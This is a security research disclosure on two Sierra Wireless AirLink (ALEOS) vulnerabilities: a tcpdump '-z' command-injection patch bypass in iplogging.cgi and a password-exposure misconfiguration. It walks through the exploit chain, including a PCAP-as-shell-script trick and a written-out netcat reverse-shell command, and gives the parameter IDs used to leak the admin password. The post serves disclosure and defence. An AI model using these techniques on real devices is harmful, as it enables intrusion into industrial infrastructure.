By OTORIO's Research Team
OTORIO researchers recently uncovered two vulnerabilities that affect multiple models of wireless IIoT devices made by Sierra Wireless, a Semtech company (NASDAQ: SMTC) and a leading vendor of critical-infrastructure connectivity. The vulnerabilities leave the devices at risk of remote code execution. They are part of OTORIO’s wireless IIoT attack surface analysis research that security researcher Roni Gavrilov will present at the upcoming S4x23 conference on February 15, 2023, in Miami.
The Sierra Wireless AirLink family of wireless gateways and modems offers customers solutions for various industrial, enterprise, and in-vehicle applications.
Vulnerabilities identified by OTORIO are present in the following AirLink products running the ALEOS operating system:
Sierra Wireless and ICS-CERT (CISA) issued advisories regarding the vulnerabilities.
A user with valid ACEManager credentials and access to the ACEManager interface can manipulate the IP-logging operation to execute arbitrary shell commands on the device.
CVSS v3.1 score: 8.0 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
A vulnerability in the ACEManager web service allows command injection through improper handling of the “-z” flag (which passes a post-rotate command to tcpdump) in requests made to /cgi-bin/iplogging.cgi.
This vulnerability is a bypass of a patch released by Sierra Wireless in April 2019 for CVE-2018-4061, reported by Talos.
The patch for the original vulnerability addressed the “-z” flag of the tcpdump command, which is supported in the ACEManager web interface.
Filtering logic for the unsafe parameter in iplogging.cgi
As you can see in the screenshot above, the regular expression removes any “-z” flag (representing the post-rotate command) as long as it is followed by a space, tab, form feed, or vertical tab, as in "tcpdump -z reboot," which was previously used to exploit the same interface in CVE-2018-4061.
However, this check is insufficient, because the command can be appended to the flag with no whitespace at all. For example, “-zreboot” easily bypasses the nearly 3-year-old patch for the previously discovered CVE.
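To make the failure mode concrete, here is an added example (not ALEOS code) contrasting a blocklist in the spirit of the patch described above with an allowlist that rejects any unknown option outright. The regex, the allowed tcpdump flags and the token character set are assumptions for illustration.

```python
import re
from typing import Optional

# Assumed reconstruction of the patch's blocklist: "-z" is stripped only
# when whitespace (space, tab, form feed, vertical tab) follows it.
FLAWED_RE = re.compile(r"-z[ \t\f\v]+\S*")

def flawed_filter(params: str) -> str:
    """Blocklist style: removes '-z <cmd>' but lets a glued '-zcmd' through."""
    return FLAWED_RE.sub("", params)

# Hardened alternative: allowlist of capture options plus a strict token
# charset, returned as an argv list for an execve-style call (no shell).
ALLOWED_FLAGS = {"-n", "-nn", "-e", "-v"}       # assumed: flags without a value
ALLOWED_WITH_VALUE = {"-i", "-s", "-c"}         # assumed: flags taking one value
SAFE_TOKEN = re.compile(r"^[A-Za-z0-9.:/]+$")   # no '-', quotes or metacharacters

def hardened_filter(params: str) -> Optional[list]:
    """Return a validated tcpdump argv tail, or None if any token is not allowlisted."""
    tokens = params.split()
    argv = []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in ALLOWED_FLAGS:
            argv.append(tok)
        elif tok in ALLOWED_WITH_VALUE:
            # The value must exist and must itself be a safe token.
            if i + 1 >= len(tokens) or not SAFE_TOKEN.match(tokens[i + 1]):
                return None
            argv += [tok, tokens[i + 1]]
            i += 1
        elif tok.startswith("-"):
            return None          # any unknown option, including -z and -zreboot
        elif SAFE_TOKEN.match(tok):
            argv.append(tok)     # BPF filter words such as "port" or "80"
        else:
            return None
        i += 1
    return argv

if __name__ == "__main__":
    for p in ["-i eth0 -z reboot", "-i eth0 -zreboot", "-i eth0 -s 0 port 80"]:
        print(repr(p), "->", repr(flawed_filter(p)), "|", hardened_filter(p))
```

The blocklist strips "-z reboot" but passes "-zreboot" untouched, whereas the allowlist rejects both and only admits the capture options the interface actually needs.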
Sending the following POST request will successfully reboot the device:
iplogging.cgi POST request rebooting the device
Executing an arbitrary binary on the system is already a problem that must be addressed. Still, without additional work, this vulnerability allows only limited command execution on the target machine.
Inspecting the tcpdump source code shows that the -z binary is executed with `execlp(any_binary, filename)`, i.e. with the capture file name as its only argument. In our case the filename is hardcoded to "/tmp/iplogging.pcap", which limits us to binaries already present on the machine and allows no user-controlled parameters. This adds another layer of complexity to achieving a remote shell on the machine.
tcpdump execution of the post-rotate command
To bypass this limitation, we found a workaround by inserting crafted data into the "/tmp/iplogging.pcap" file, making the file both a valid PCAP and a valid shell script, along with “sh” as the post-rotation command.
Data can be inserted into the target PCAP file by transmitting it directly to the appropriate interface. However, as other communication on the interface may cause issues, an alternative solution is to use the "/cgi-bin/iplogging_upload.cgi" page.
Here is how it was done:
iplogging_upload.cgi POST request
iplogging.cgi POST request
At this phase, the tcpdump program reads our crafted PCAP file (“/tmp/iplogging_params.tcp”) and writes it to the predefined output file (“/tmp/iplogging.pcap”). Once the first MB of data has been written, it executes /bin/sh with a single argument: the 1 MB file containing the data from our crafted PCAP, now stored in “/tmp/iplogging.pcap.” /bin/sh evaluates the file line by line, rejecting the PCAP header as "bad lines" and continuing to our reverse-shell command, embedded as a separate line: ‘nohup nc {IP} {PORT} -e /bin/sh &’.
Reverse shell on Airlink device
A user with valid ACEManager credentials and access to the ACEManager interface can reconfigure the device to expose the ACEManager credentials on the pre-login status page. This leads to a persistent backdoor to the system and cleartext exposure of the admin password.
CVSS v3.1 score: 4.5 (AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N)
The Embedded_Ace_Set_Task.cgi executable allows modification of configuration values within the configuration manager. An attacker could exploit this by enabling the “Device Status Screen” configuration parameter (55052) and adding the password parameter (5003) to the list of parameters displayed on the pre-login page (55053).
Embedded_Ace_Set_Task.cgi POST request
As a result, the password becomes visible on the pre-login page:
Pre-login page with admin password exposed
OTORIO responsibly disclosed these vulnerabilities to Sierra Wireless and CISA. Both organizations’ corresponding advisories can be found here:
Sierra Wireless released updated firmware to address these vulnerabilities. Users are urged to update their devices, restrict access to the web interface, and implement strong credentials. Devices exposed to the WAN are particularly at risk, and immediate action is recommended to mitigate this risk.
We appreciate the professional manner in which Sierra Wireless handled the disclosure of the vulnerabilities, and the coordination of the U.S. Cybersecurity and Infrastructure Security Agency (CISA).